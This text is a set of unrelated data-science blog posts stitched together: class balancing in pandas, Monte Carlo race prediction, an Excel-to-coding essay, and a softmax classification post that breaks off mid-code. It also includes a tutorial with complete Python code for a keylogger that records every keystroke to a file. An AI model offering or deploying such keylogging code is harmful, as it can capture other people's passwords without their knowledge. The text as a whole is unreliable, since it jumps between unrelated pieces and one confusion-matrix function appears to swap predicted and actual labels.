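n_minority = counts.min()         # here: 3 rows

majority = z[z["Click"] != minority_label]
minority = z[z["Click"] == minority_label]

# Randomly keep only n_minority rows of the majority class (no replacement)
balanced = pd.concat([majority.sample(n_minority, random_state=7), minority])
print(balanced["Click"].mean())  # click rate is now 0.5
```

The full version below also has to work out which class is the majority per campaign, which is exactly the tricky part described above.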
#get the unique campaigns
campaigns = df.Campaign.unique()
sampled = pd.DataFrame()

for i in campaigns:
    print(i)
    #keep the campaign we want to sample
    z = df.query(f'Campaign=="{i}"')
    A = z[z['Click'] == 0][['Click']]
    B = z[z['Click'] == 1][['Click']]

    #find out which is the Minority and which the Majority
    if len(A) > len(B):
        majority = A
        minority = B
    else:
        majority = B
        minority = A

    #Sampling
    indexes = majority.sample(len(minority), random_state=7).index
    #what we did here is to get the indexes that are NOT in the sample above
    #so we can remove them from our data frame z in the following steps
    indexes = majority.loc[~majority.index.isin(indexes)].index
    z = z.loc[~z.index.isin(indexes)]
    sampled = pd.concat([sampled, z])

sampled.groupby('Campaign').mean()
            Click
Campaign
Camera        0.5
Computer      0.5
Smartphone    0.5
We lost some of our data, but what remains is more meaningful for our model. This is not the only way to deal with this kind of problem, but it is a simple one. Biased data is one of the most common problems in machine learning and can lead to major issues, so this is a nice tool to add to your toolset.
There are many different approaches to predict the winner of a race. The race can be any distance and the runners can be dogs, horses and humans. Also, apart from trying to predict the winner, it may be possible to answer other questions like the probability of a runner being on the podium (top three positions) and so on.
Personally, I prefer to approach this kind of problem with Monte Carlo simulation instead of trying to build machine learning models. Let’s describe the Monte Carlo approach.
Let’s say that we want to predict the probability of each runner winning a race of 100 meters. For our model we want the past racing times of the runners over some recent period, say the last one to two years, provided we have a sufficient number of races. Then we calculate the mean and the standard deviation of each runner’s times. Notice that it makes sense to use an exponential moving average for the mean (and perhaps for the standard deviation) in order to give more weight to the most recent observations. Another good technique is to remove the worst time of each racer.
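As a side note, removing each racer's worst (slowest) time is a one-liner with a pandas groupby; a sketch with hypothetical NAME/TIME data:

```python
import pandas as pd

df = pd.DataFrame({
    "NAME": ["A", "A", "A", "B", "B", "B"],
    "TIME": [13.1, 13.4, 12.9, 13.0, 13.6, 13.2],  # seconds; lower is better
})

# Find the row holding each runner's slowest (maximum) time and drop it
worst_idx = df.groupby("NAME")["TIME"].idxmax()
df_trimmed = df.drop(worst_idx)
print(df_trimmed.groupby("NAME")["TIME"].max())  # A: 13.1, B: 13.2
```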
You can easily compute the exponential moving average with pandas. Let’s show how. Assume that our data frame has the NAME of the runner and the TIME, ordered by DATE. Our logic is to compute the rolling EWM and then keep the last value for each runner.
import pandas as pd
import numpy as np

# convert the DATE column to datetime
df['DATE'] = pd.to_datetime(df.DATE)

# sort by date
df.sort_values('DATE', inplace=True)

df['mean_tmp'] = df.groupby('NAME')['TIME'].transform(lambda x: x.ewm(alpha=0.30).mean())
df['std_tmp'] = df.groupby('NAME')['TIME'].transform(lambda x: x.ewm(alpha=0.30).std())

# remove the NaN in std
df.dropna(subset=['std_tmp'], inplace=True)

# get the most recent observation of the EWM
runners = df.groupby('NAME')[['mean_tmp', 'std_tmp']].last()
runners.reset_index(inplace=True)
runners.columns = ['NAME', 'mean', 'std']
runners
Assume that we come up with the following mean and standard deviation for the 8 runners.
runner = pd.DataFrame({
    'NAME': ["A", "B", "C", "D", "E", "F", "G", "H"],
    'mean': [13.11, 13.17, 12.99, 12.96, 13.25, 13.00, 13.40, 13.29],
    'std': [0.15, 0.15, 0.17, 0.20, 0.14, 0.16, 0.17, 0.2]
})
Let’s get the probability of each runner winning by running a Monte Carlo simulation, approximating each runner’s times with a normal distribution with the corresponding parameters.
np.random.seed(5)

# number of simulations
sims = 1000

runner['monte_carlo'] = runner.apply(
    lambda x: np.random.normal(x['mean'], x['std'], sims), axis=1
)
Once we have simulated the data, we can compute the probability of each runner winning.
# Probability to finish in top x positions
top_x = 1

tmp_probs = pd.DataFrame(
    (pd.DataFrame(list(runner['monte_carlo']), index=runner.NAME).rank() <= top_x).sum(axis=1) / sims
)
tmp_probs.reset_index(inplace=True)
tmp_probs.columns = ['NAME', 'Probability']
As we can see, runner D has a 34.8% probability of winning, making him the favorite!
Similarly, we can estimate the probability of each runner to be on the podium, i.e. in the top 3 positions.
# Probability to finish in top x positions
top_x = 3  # in top three positions

tmp_probs = pd.DataFrame(
    (pd.DataFrame(list(runner['monte_carlo']), index=runner.NAME).rank() <= top_x).sum(axis=1) / sims
)
tmp_probs.reset_index(inplace=True)
tmp_probs.columns = ['NAME', 'Probability']
In this article we will discuss how to make a simple keylogger using Python.
Table of Contents
Keyloggers are a type of monitoring software used to record keystrokes made by the user with their keyboard.
They are often used for monitoring network usage as well as troubleshooting technical problems. On the other hand, a lot of malicious software uses keyloggers to try to capture usernames and passwords for different websites.
To continue following this tutorial we will need the following Python library: pynput.
If you don’t have it installed, please open “Command Prompt” (on Windows) and install it using the following code:
pip install pynput
The first thing we will discuss is how to control the keyboard using Python and specifically how to press keys on the keyboard.
There are two types of keys that we should consider:
To begin controlling the keyboard, we need to create an instance of the Controller() class, which has the .press() and .release() methods. This class sends the keyboard events to our system.
You can think of these methods exactly as they are described, and it is how we type, we press and release each key on the keyboard.
Here is a simple example:
from pynput.keyboard import Controller

keyboard = Controller()

keyboard.press('a')
keyboard.release('a')
Note that this code will type “a” wherever your mouse cursor is located. It is also designed to press and release one key at a time.
Of course you can press and release multiple keys:
from pynput.keyboard import Controller

keyboard = Controller()

keyboard.press('a')
keyboard.release('a')
keyboard.press('b')
keyboard.release('b')
Now you will see that the output is “ab”.
Now, how do we handle special keys? What if I want to press “a b” (a, space, b)?
A complete list of all special keys is available here. Special keys are called using the Key class from the pynput module.
Here is an example:
from pynput.keyboard import Key, Controller

keyboard = Controller()

keyboard.press('a')
keyboard.release('a')
keyboard.press(Key.space)
keyboard.release(Key.space)
keyboard.press('b')
keyboard.release('b')
And the output is “a b”.
This option works for special keys that we press and release, such as space, enter, and so on. But how about the keys that we keep pressed while typing? Such as shift? And our goal is to press “Ab” (capital a, b).
There must be some convenient way of doing this. And there is! The Controller() class has a very useful .pressed() method that we can use:
from pynput.keyboard import Key, Controller

keyboard = Controller()

with keyboard.pressed(Key.shift):
    keyboard.press('a')
    keyboard.release('a')

keyboard.press('b')
keyboard.release('b')
And the output is “Ab”.
You can practice with different combinations of keys, and depending on what you need the code can differ a little, but this is a general overview of how the press and release logic works for controlling the keyboard.
We would like our keylogger to record the keys that we press and store them in a simple text file.
Let’s first create this sample file and then integrate it into the key logging process:
with open("log.txt", "w") as logfile:
    logfile.write("This is our log file")
Running the above code will create a log.txt file which will have This is our log file written in it. In our case, we would like Python to record the keys that we press and add them to this file.
We already know how to create the log.txt file with some sample text. Now, what we want to do is have Python write the keys we press into this file (rather than having the sample text there).
So let’s first think conceptually about what we want to happen. We need a list that keeps appending the keys we press on the keyboard, right? Then, each time a key is pressed, we write this list to a file.
Let’s see how we can do it:
#Import required modules
from pynput.keyboard import Key

#Create an empty list to store pressed keys
keys = []

#Create a function that defines what to do on each key press
def on_each_key_press(key):
    #Append each pressed key to a list
    keys.append(key)
    #Write list to file after each key pressed
    write_keys_to_file(keys)
Okay, so conceptually the above function works, but we still need to define our write_keys_to_file() function.
Keep in mind that so far each pressed key comes in pynput’s key format, and in order to write it to a file we need it as a string. In addition, we need to remove the quotation marks from each key so that we can join them together.
def write_keys_to_file(keys):
    #Create the log.txt file with write mode
    with open('log.txt', 'w') as logfile:
        #Loop through each key in the list of keys
        for key in keys:
            #Convert key to String and remove quotation marks
            key = str(key).replace("'", "")
            #Write each key to the log.txt file
            logfile.write(key)
Okay, now on each key press Python will create a log.txt file with the list of keys pressed since the time the script started running up to the last key pressed.
If we leave the code as is, it will keep running all the time. What we want to do is to define some stop key or a combination of keys that will stop the key logger. Let’s say, our stop key is “Esc”. How would we do it?
We already know that if we press “Esc”, it will be added to log.txt, so what we can do is define an operation that will take place once we release the “Esc” key after pressing it:
#Create a function that defines what to do on each key release
def on_each_key_release(key):
    #If the key is Esc then stop the keylogger
    if key == Key.esc:
        return False
As the last step we will need to assemble everything together and get the keylogger running.
To run our keylogger we will need some sort of listening instance that will record keyboard events. To do this we will use the Listener() class from the pynput module.
This class has a few parameters, but we will need only two of them:
As you can see from our steps, we can pass our defined on_each_key_press() and on_each_key_release() functions as parameters to the Listener() class and then join the listener thread so it keeps running:
from pynput.keyboard import Listener

with Listener(
    on_press=on_each_key_press,
    on_release=on_each_key_release
) as listener:
    listener.join()
Now that we have all the components, let’s look at the complete code for a simple keylogger in Python.
from pynput.keyboard import Key, Listener

keys = []

def on_each_key_press(key):
    keys.append(key)
    write_keys_to_file(keys)

def write_keys_to_file(keys):
    with open('log.txt', 'w') as logfile:
        for key in keys:
            key = str(key).replace("'", "")
            logfile.write(key)

def on_each_key_release(key):
    if key == Key.esc:
        return False

with Listener(
    on_press=on_each_key_press,
    on_release=on_each_key_release
) as listener:
    listener.join()
In this article we covered how you can create a simple keylogger using Python and pynput library.
Feel free to leave comments below if you have any questions or have suggestions for some edits and check out more of my Python Programming articles.
The post Create a Keylogger using Python appeared first on PyShark.
Excel is arguably the world’s largest coding community, with 750 million users worldwide. Many of us, myself included, get introduced to the data world from Excel.
But the thing is… Excel is not coding, not exactly. Like any software, Excel has its limitations, which a full-blown programming language like R or Python can make up for.
This is a huge market, so it’s not surprising to find a bevy of educational offerings on “how to learn coding from an Excel user’s perspective.” In fact, I’m surprised there isn’t more.
The problem is that little of this training follows solid instructional design principles. It does not help the user make a graceful pivot from Excel to coding.
Here’s what I see wrong with most “coding for Excel users” programs.
There is a stream of training, particularly for Python, that aims to teach users how to automate the production of Excel workbooks or conduct basic data analysis, by populating data, formatting worksheets and so forth.
The idea here is that it doesn’t actually take much knowledge of Python to make great strides in automating workbooks.
This attitude is like saying you don’t really need to know how to drive a car “that well” if you are just driving up to the corner.
This is a counterproductive approach: it may seem like a time-saver to cut corners and half-train, but over time it invites serious errors that will take lots of cleanup.
While I encourage analysts to merge their abilities in spreadsheets and coding (in fact, often the most fruitful data products come from such mashups), I highly discourage learning coding just to automate spreadsheets. In the long run, it does not offer solid footing into coding.
Fortunately, not all spreadsheets-to-coding training jumps the gun like the above. Often, it does provide step-by-step fundamentals to learning a programming language.
A common problem with this approach is it doesn’t do nearly enough to explicitly help students bridge the “mental model” of spreadsheets into coding.
This is such an overlooked teaching tool! After all:
Students learn new ideas by relating them to what they already know, and then transferring them into their long-term memory.
“How People Learn: An Evidence-Based Approach,” Paul Bruno (source: Edutopia)
I so often look at “introduction to coding for spreadsheet users” training and think that it could just as easily be a generic “introduction to coding” course: that is, there is nothing in it unique to the perspective of a spreadsheet user.
Here are some approaches I take in relating new ideas about coding to what students already know about spreadsheets:
- VLOOKUP() is really building a left outer join of sorts.

This last one is more of a course “attitude” than an instructional approach, but it may be the most detrimental of them all.
The attitude sounds like this:
You’ve been using Excel when you really should be coding. Look at all these problems with using spreadsheets! Time to kick the habit.
This is the wrong attitude to take for a couple of reasons:
Earlier I mentioned the importance of helping students learn new ideas by relating them to what they already know.
Guess what? It’s hard to relate new ideas when you’re told what you already know is garbage.
Excel users intuitively understand how to work with data: they can sort, filter, group and join. Now it’s just a matter of pairing code to concept rather than starting from scratch. This is not wasted effort by a long shot.
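To make that pairing concrete, here is a sketch with hypothetical toy tables (not from any course) mapping a few spreadsheet staples, including VLOOKUP’s cousin, the left outer join, to pandas one-liners:

```python
import pandas as pd

sales = pd.DataFrame({"item": ["cup", "plate", "cup", "bowl"],
                      "qty": [4, 7, 1, 9]})
prices = pd.DataFrame({"item": ["cup", "plate"], "price": [27, 21]})

sorted_df = sales.sort_values("qty")                      # Excel: Sort
filtered_df = sales[sales["qty"] > 3]                     # Excel: Filter
grouped = sales.groupby("item")["qty"].sum()              # Excel: PivotTable
joined = sales.merge(prices, on="item", how="left")       # Excel: VLOOKUP

print(grouped["cup"])  # 5
# Unmatched lookups ("bowl") come back as NaN rather than #N/A
```

Each line does something the Excel user already understands; only the syntax is new.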
What a drag! It’s not a great motivator for students to be told that what they know is worthless. Moreover, it undercuts using Excel as a bridge to new concepts: if we are burning Excel down, why try to build off of it?
In addition to being a horrible teaching tactic, this attitude is just incorrect: there is no reason to pitch Excel from the data workflow!
I make a big deal of the data analytics stack because it serves to contextualize data tools as “slices” of the same stack. This way, we can see tools in a “yes, and” relationship instead of “either/or.”
Excel absolutely has a place in data analytics. So does programming. Learning and using one does not negate the other.
But it should be something like this instead:
Excel is a great tool for data analysis, but it’s not the only tool. Python is a valuable tool for many things as well. But this doesn’t mean you should throw out Excel entirely! It will always be a great tool for data prototyping and providing interactive data models for end-users.
You’ve also learned way more than you realized about coding from using Excel. Many of the tasks you perform on data all the time can also be done in Python.
An approach like this is more honest and more encouraging.
So, take a look at your “coding for spreadsheet users” content. How is it purposefully using the “mental model” of spreadsheets to teach coding? Is the course predicated on the idea that spreadsheets suck and shouldn’t be used anymore?
Learning to code is no small feat, so training programs that pretend it is usually fail. That’s the problem with the “learn a bit of Python to automate your Excel workbooks” school of thought.
At the same time, Excel users are not the average newbie coder, as they’ve worked with manipulating data and writing functions for some time. It’s important this training dig into these strengths — and, yes, spreadsheet mastery is a strength which should not be discarded.
These are topics which I address head-on in my book, Advancing into Analytics: From Excel to Python and R.
Spreadsheet users: I am one of you. Let me help you level up your data skills. No snark, no cheap shortcuts. Just the straightest learning path from spreadsheets to coding. I look forward to your thoughts on the book.
Our last post examined the correspondence between a logistic regression and a simple neural network using a sigmoid activation function. The downside of such models is that they only produce binary outcomes. We argued (not very forcefully) that if investing is about assessing the probability of achieving an attractive risk-adjusted return, then it makes sense to model investment decisions as probability functions. Moreover, most practitioners would probably prefer to know whether next month’s return is likely to be positive and how confident they should be in that prediction. They want to get direction right first. That’s binary.
But what about magnitude and relative performance? Enter multiclass logistic regression and neural networks with the softmax activation function. Typically multiclass (or multinomial) classifications are used to distinguish categories like Pekingese from Poodles, or Shih-tzus. With a bit of bucketing, one can do the same with continuous variables like stock returns. This may reduce noise somewhat, but also gets at the heart of investing: the shape of returns. Most folks who’ve been around the markets for a while know that returns are not normally distributed, particularly for stocks.^{1} Sure, they’re fat-tailed and often negatively skewed. Discussed less frequently is that these returns also cluster around the mean. In other words, there are far more days of utter boredom, sheer terror, or unbearable ecstasy^{2} than implied by the normal distribution.
While everyone wants to knock the ball out of the park and avoid the landmines, those events are difficult to forecast given their rarity even for the fat-tailed distribution. Sustained performance is likely to come from compounding in the solid, but hardly heroic area above the mean return near the one sigma boundary. These events are more frequent and also offer more data with which to work. Indeed, since 1970 almost 40% of the S&P 500’s daily returns fell into that area vs. the expectation of only 34% based on the normal distribution.
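That 34% figure is just the normal distribution's mass between the mean and one standard deviation above it, which we can check with the standard library's error function:

```python
import math

# P(0 <= Z <= 1) for a standard normal:
# Phi(1) - Phi(0) = 0.5 * erf(1 / sqrt(2))
p = 0.5 * math.erf(1 / math.sqrt(2))
print(round(p, 4))  # 0.3413, i.e. about 34%
```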
How would we go about classifying the probability of different returns? First, we’d bucket the returns according to some quantile and then run the regression or neural network on those buckets to get the predictions. Multiclass logistic regressions use the softmax function, which looks like the following:
\[
\text{Softmax}(k, x_{1}, \ldots, x_{n}) = \Large\frac{e^{x_{k}}}{\sum_{i=1}^{n}e^{x_{i}}}
\]

\[
f(k) =
\begin{cases}
1 \text{ if } k = argmax(x_{1}, \ldots, x_{n})
\\
0 \text{ otherwise}
\end{cases}
\]
Here \(x_{k}\) is whatever combination of weights and biases with the independent variable that yields the maximum value for a particular class. Thus that value over the sum of all the exponentiated values yields the model’s likelihood for a particular category. How exactly does this happen? A multiclass logistic regression aggregates individual logistic regressions for the probability of each category with respect to all the other categories. Then it uses the fact that the probabilities must sum to one to yield the softmax function above. The intuition is relatively straightforward: how often do we see one class vs. all the rest based on some data? Check out the appendix for a (slightly!) more rigorous explanation.
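In code, the softmax function itself is only a couple of numpy lines; a minimal sketch (subtracting the max before exponentiating is a standard numerical-stability trick, not part of the math above):

```python
import numpy as np

def softmax(x):
    # Exponentiate each score, then normalize so probabilities sum to one
    z = np.exp(x - np.max(x))  # subtract max for numerical stability
    return z / z.sum()

scores = np.array([2.0, 1.0, 0.1, -1.0])
probs = softmax(scores)
print(probs.sum())     # 1.0
print(probs.argmax())  # 0 -- the largest score gets the largest probability
```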
Let’s get to our data, split it into four quartiles for simplicity, and then run a logistic regression on those categories. Recall we’re using the monthly return on the S&P 500 as well as the return on the 10-month moving average vs. the one-month forward return, which we transform into four buckets: below -1.9%, between -1.9% and 0.5%, between 0.5% and 3.6%, and above 3.6%. We’ll dub these returns with the following technical terms: Stinky, Poor, Mediocre, and Good.
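The bucketing step is a single call to pandas' qcut; a sketch on hypothetical toy returns (the article's actual cut points come from its own data):

```python
import pandas as pd
import numpy as np

rng = np.random.default_rng(0)
returns = pd.Series(rng.normal(0.008, 0.04, 500))  # toy monthly returns

# Four equal-count buckets, labeled with the article's technical terms
buckets = pd.qcut(returns, 4, labels=["Stinky", "Poor", "Mediocre", "Good"])
print(buckets.value_counts())  # 125 observations per bucket
```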
Now we’ll run the regressions and present the confusion matrix as before.
Whoa dude, is this some weird sudoku? Not really. Still, a four-by-four confusion matrix isn’t the easiest to read. Bear with us as we explain. The diagonal from the upper left to the lower right contains the true positives. The rows associated with each true positive are the false positives while the columns are the false negatives. The true negative is essentially all the other cells that don’t appear in either the row or the column for the particular category. So the true negative for the Stinky category would be the sum of the 3×3 matrix whose top left corner starts in the cell of the second row and second column.
Organizing the data this way is better than nothing, but it could be more insightful. We can see that the multiclass logistic regression is not that strong in the Poor category, but is much better in the Good category. Let’s compute the true positive and false positive rates along with the precision for each category, which we show in the table below.
| Outcome | TPR | FPR | Precision |
|---|---|---|---|
| Stinky | 29.7 | 32.1 | 23.7 |
| Poor | 3.2 | 3.1 | 25.0 |
| Mediocre | 42.9 | 26.7 | 34.6 |
| Good | 45.3 | 31.1 | 33.0 |
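For reference, these per-class rates fall out of a confusion matrix with a few numpy sums; a sketch using hypothetical 3x3 counts (not the table above), with predictions on the rows as in our matrices:

```python
import numpy as np

# Rows: predicted class, columns: actual class (hypothetical counts)
cm = np.array([[19,  5, 20],
               [ 4, 30,  6],
               [ 7,  8, 25]])

TP = np.diag(cm)                  # correct predictions per class
FP = cm.sum(axis=1) - TP          # rest of each prediction row
FN = cm.sum(axis=0) - TP          # rest of each actual column
TN = cm.sum() - (TP + FP + FN)    # everything else

tpr = TP / (TP + FN)              # true positive rate (recall)
fpr = FP / (FP + TN)              # false positive rate
precision = TP / (TP + FP)
```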
Even with this refinement, the table still isn’t the easiest to interpret. The model’s best true positive rate (TPR) performance is in the Good category, but its false positive rate (FPR) is also one of the highest. Shouldn’t we care about being really wrong? True, we don’t want to be consistently wrong. But we really don’t want to believe we’re going to generate a really good return and end up with a really Stinky one.
We’ll create a metric called the Really Wrong Rate (RWR) which will be the number of really wrong classifications over the total classifications the model made for that category. For example, for the Stinky outcome, the model got 19 correct (the top left box) but got 20 really wrong (the top right box). Thus its RWR is about 25% and its Precision to RWR is about 0.95. In other words, it’s getting more categories really wrong than correct.
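Putting numbers to that: with 19 correct and 20 really wrong out of roughly 80 Stinky predictions (the total is inferred here from the 23.7% precision, so treat it as approximate):

```python
# Stinky row of the confusion matrix (counts from the text above)
correct = 19       # predicted Stinky, actually Stinky
really_wrong = 20  # predicted Stinky, actually Good
total_preds = 80   # all Stinky predictions (inferred)

precision = correct / total_preds  # ~0.237
rwr = really_wrong / total_preds   # 0.25
print(round(precision / rwr, 2))   # 0.95 -- really wrong more often than right
```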
What about the others? For the Good category, the RWR is almost 30% and the Precision to RWR is 1.12. That seems like a good edge. The model is really right about 12% more often than it’s really wrong. However, if you look at correctly identified categories plus incorrectly identified positive returns (the Good and Mediocre columns) relative to incorrectly identified categories with negative returns (the Stinky and Poor columns), the results are much worse: a ratio of about 0.83. Got that? Let’s move on to the neural network, before we get bogged down in confusion matrix navel gazing.
Unlike the linear regression or binary logistic regression, a simple neural network can’t approximate a multiclass logistic regression easily. Indeed, it takes a bit of wrangling to get something close, so we won’t bore you with all the iterations. We will show one or two just so you know how much effort we put in!
First, a single layer perceptron, with four output neurons, and a softmax activation function. We graph the model’s accuracy over 100 epochs along with logistic regression accuracy—the red dotted line—below.
Not very inspiring. When we include a hidden layer with 20 neurons (an entirely arbitrary number!), but the same parameters as before, we get the following graph.
Definitely better. We see that around the 37th epoch, the NN’s accuracy converges with the logistic regression, but it does bounce around above and below that for the remaining epochs.
Let’s build a deeper NN, this time with three layers of 20 neurons each. For graphical purposes, the architecture of this NN looks like the following:
Plotting accuracy by epoch, gives us the next graph:
This denser NN achieves a better accuracy than the logistic regression sooner than the others, and its outperformance persists longer. Of course, even when it does perform worse, it isn’t that dramatic—about one or two percentage points.
We’ll stop the model at the first point where it converges with the logistic regression, which happens to be the tenth epoch, and create the confusion matrix below.
Again, a bit of struggle to discern much from this table, other than the model does not appear to predict Mediocre returns with much frequency even though they represent about 25% of the occurrences. Let’s look at some of the scores.
| Outcome | TPR | FPR | Precision |
|---|---|---|---|
| Stinky | 25.0 | 14.7 | 36.4 |
| Poor | 30.2 | 26.7 | 27.1 |
| Mediocre | 6.3 | 3.1 | 40.0 |
| Good | 59.4 | 48.4 | 29.2 |
The NN model has a much better true positive rate (TPR) than the logistic regression for Good outcomes, but the false positive rate (FPR) is high too. While the NN model is worse than the regression model on Stinky outcomes, its FPR is less than half that of the regression. Interestingly, both models are poor at predicting one category: Poor outcomes for the regression model vs. Mediocre outcomes for the NN. We’re not sure why that would be the case.
The Stinky RWR is about 18%, yielding a Precision to RWR ratio of 2 on the Stinky outcomes, much better than the logistic regression’s ratio of 0.95. In other words, the NN is twice as likely to predict a Stinky outcome correctly as to incorrectly predict a Good outcome as a Stinky one.
Should we favor the logistic regression over a NN with softmax activation? Hard to say. Accuracy results are similar, but we did have to play with the NN a lot more. More than accuracy, once you look under the hood, results diverge. The greater flexibility of the NN might help us tune a model to arrive at our desired true positive, false positive, and/or really wrong rates. But that might come at the risk of overfitting. Moreover, it’s still unclear why both models picked one category as less likely even though each category should have had an equal chance of occurring. We’d need to engage in more data analysis to figure out what we’re missing.
What are some other avenues we could explore? We could build denser neural networks. We could backtest the predictions to gauge performance. This would probably be done best using walk-forward analysis. Of course, a drawback with this is that few people were using neural networks to run trading algorithms during the 70s and 80s so the results could be spurious. That is, if people had been employing such algorithms, returns could have been a lot different. Another avenue is to change the bucketing mechanism so that we focus on the range of outcomes we’re most interested in or would be most likely to achieve high risk-adjusted returns.
We’ll leave those musings for now. Let us know what you’d like to read by sending an email to the address below. Want more on multiclass regressions and softmax functions? Or should we explore if neural networks can approximate decision trees and random forests? Let us know! Until then, have a look at the Appendix after the code. It walks through the link between logistic and softmax functions. And by all means, have a look at the code!
Built using R 4.0.3 and Python 3.8.3

# [R]
# Load libraries
suppressPackageStartupMessages({
    library(tidyverse)
    library(tidyquant)
    library(reticulate)
})

# [Python]
# Load libraries
import warnings
warnings.filterwarnings('ignore')

import numpy as np
import pandas as pd
import statsmodels.api as sm
import matplotlib
import matplotlib.pyplot as plt
import os
import tensorflow as tf
from tensorflow import keras

os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = 'C:/Users/user_name/Anaconda3/Library/plugins/platforms'
plt.style.use('ggplot')
plt.rcParams['figure.figsize'] = (12, 6)

# Directory to save images
DIR = "your/image/directory"

def save_fig_blog(fig_id, tight_layout=True, fig_extension="png", resolution=300):
    path = os.path.join(DIR, fig_id + "." + fig_extension)
    print("Saving figure", fig_id)
    if tight_layout:
        plt.tight_layout()
    plt.savefig(path, format=fig_extension, dpi=resolution)

## Pull data and split
# See past posts for code
sp_mon = pd.read_pickle('sp_mon_tf_2.pkl')
data = sp_mon.dropna()

X_train = data.loc[:'1991', ['ret', '10ma_ret']]
y_train = data.loc[:'1991', '1_mon_ret']
X_valid = data.loc['1991':'2000', ['ret', '10ma_ret']]
y_valid = data.loc['1991':'2000', '1_mon_ret']
X_test = data.loc['2001':, ['ret', '10ma_ret']]
y_test = data.loc['2001':, '1_mon_ret']

y_train_trans = pd.qcut(y_train, 4, labels=[0, 1, 2, 3])

# Modest search for best solvers and regularization hyperparameters
from sklearn.linear_model import LogisticRegression

solvers = ['lbfgs', 'newton-cg', 'sag', 'saga']
for solver in solvers:
    log_reg = LogisticRegression(penalty='l2', solver=solver, multi_class='multinomial')
    log_reg.fit(X_train, y_train_trans)
    log_pred = log_reg.predict(X_train)
    print(log_reg.score(X_train, y_train_trans))

Cs = [10.0**-x for x in np.arange(-2, 3)]
for c in Cs:
    log_reg = LogisticRegression(penalty='l2', multi_class='multinomial', C=c)
    log_reg.fit(X_train, y_train_trans)
    print(log_reg.score(X_train, y_train_trans))

log_reg = LogisticRegression(penalty='l2', multi_class='multinomial')
log_reg.fit(X_train, y_train_trans)
log_reg.score(X_train, y_train_trans)

## Sigmoid on four classes
# Not shown
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)

y_train_cat = keras.utils.to_categorical(y_train_trans)

model = keras.models.Sequential([
    keras.layers.Dense(4, activation='sigmoid', input_shape=X_train.shape[1:])
])

model.compile(loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy'])
history = model.fit(X_train, y_train_cat, epochs=100)

## Softmax on four classes
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)

model = keras.models.Sequential([
    keras.layers.Dense(4, activation='softmax')
])

model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])
history = model.fit(X_train, y_train_cat, epochs=100)

# Graph accuracy
log_score = log_reg.score(X_train, y_train_trans)
log_hist_df = pd.DataFrame(history.history)
log_hist_df.index = np.arange(1, len(log_hist_df) + 1)

log_hist_df['accuracy'].plot(style='b-')
plt.axhline(log_score, color='red', ls=':')
plt.xticks(np.arange(0, len(log_hist_df) + 1, 10))
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.title("Neural network training error by epoch")
plt.legend(['Neural network', 'Logistic regression'], loc='upper left',
           bbox_to_anchor=(0.0, 0.9))
save_fig_blog('nn_vs_log_reg_tf3')
plt.show()

## Softmax with one hidden layer
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)

model = keras.models.Sequential([
    keras.layers.Dense(20, activation='relu', input_shape=X_train.shape[1:]),
    keras.layers.Dense(4, activation='softmax')
])

model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])
history = model.fit(X_train, y_train_cat, epochs=100)

# Graph
log_score = log_reg.score(X_train, y_train_trans)
log_hist_df = pd.DataFrame(history.history)
log_hist_df.index = np.arange(1, len(log_hist_df) + 1)

log_hist_df['accuracy'].plot(style='b-')
plt.axhline(log_score, color='red', ls=':')
plt.xticks(np.arange(0, len(log_hist_df) + 1, 10))
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.title("Neural network training error by epoch")
plt.legend(['Neural network', 'Logistic regression'], loc='upper left')
save_fig_blog('nn_vs_log_reg_2_tf3')
plt.show()

## Three hidden layer architecture
from nnv import NNV

layersList = [
    {"title": "Input\n", "units": 2, "color": "blue"},
    {"title": "Hidden 1\n(ReLU)", "units": 20},
    {"title": "Hidden 2\n(ReLU)", "units": 20},
    {"title": "Hidden 3\n(ReLU)", "units": 20},
    {"title": "Output\n(Softmax)", "units": 4, "color": "blue"},
]

NNV(layersList, max_num_nodes_visible=12, node_radius=8,
    font_size=10).render(save_to_file=DIR + "/nn_tf3.png")
plt.show()

## Softmax with three hidden layers
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)

model = keras.models.Sequential()
model.add(keras.layers.Dense(20, activation='relu', input_shape=X_train.shape[1:]))
for layer in range(2):
    model.add(keras.layers.Dense(20, activation='relu'))
model.add(keras.layers.Dense(4, activation='softmax'))

model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])
history = model.fit(X_train, y_train_cat, epochs=100)

log_score = log_reg.score(X_train, y_train_trans)
log_hist_df = pd.DataFrame(history.history)
log_hist_df.index = np.arange(1, len(log_hist_df) + 1)

log_hist_df['accuracy'].plot(style='b-')
plt.axhline(log_score, color='red', ls=':')
plt.xticks(np.arange(0, len(log_hist_df) + 1, 10))
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.title("Neural network training accuracy by epoch")
plt.legend(['Neural network', 'Logistic regression'], loc='upper left')
save_fig_blog('nn_vs_log_reg_3_tf3')
plt.show()

## Rerun stopping early
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)

model = keras.models.Sequential()
model.add(keras.layers.Dense(20, activation='relu', input_shape=X_train.shape[1:]))
for layer in range(2):
    model.add(keras.layers.Dense(20, activation='relu'))
model.add(keras.layers.Dense(4, activation='softmax'))

model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])
history = model.fit(X_train, y_train_cat, epochs=10)

## Create confusion matrix table function
# Help from SO
# https://stackoverflow.com/questions/50666091/true-positive-rate-and-false-positive-rate-tpr-fpr-for-multi-class-data-in-py/50671617
from sklearn.metrics import confusion_matrix
# from sklearn.metrics import precision_score, recall_score, roc_curve

def conf_mat_table(predicted, actual, title='Logistic regression', save=False,
                   save_title=None, print_metrics=False):
    conf_mat = confusion_matrix(y_true=predicted, y_pred=actual)

    fig, ax = plt.subplots(figsize=(14, 8))
    ax.matshow(conf_mat, cmap=plt.cm.Blues, alpha=0.3)
    for i in range(conf_mat.shape[0]):
        for j in range(conf_mat.shape[1]):
            ax.text(x=j, y=i, s=conf_mat[i, j], fontsize=14, va='center', ha='center')

    ax.xaxis.set_ticks_position('top')
    ax.xaxis.set_label_position('top')
    ax.set_xticklabels(['', 'Stinky', 'Poor', 'Mediocre', 'Good'], fontsize=14)
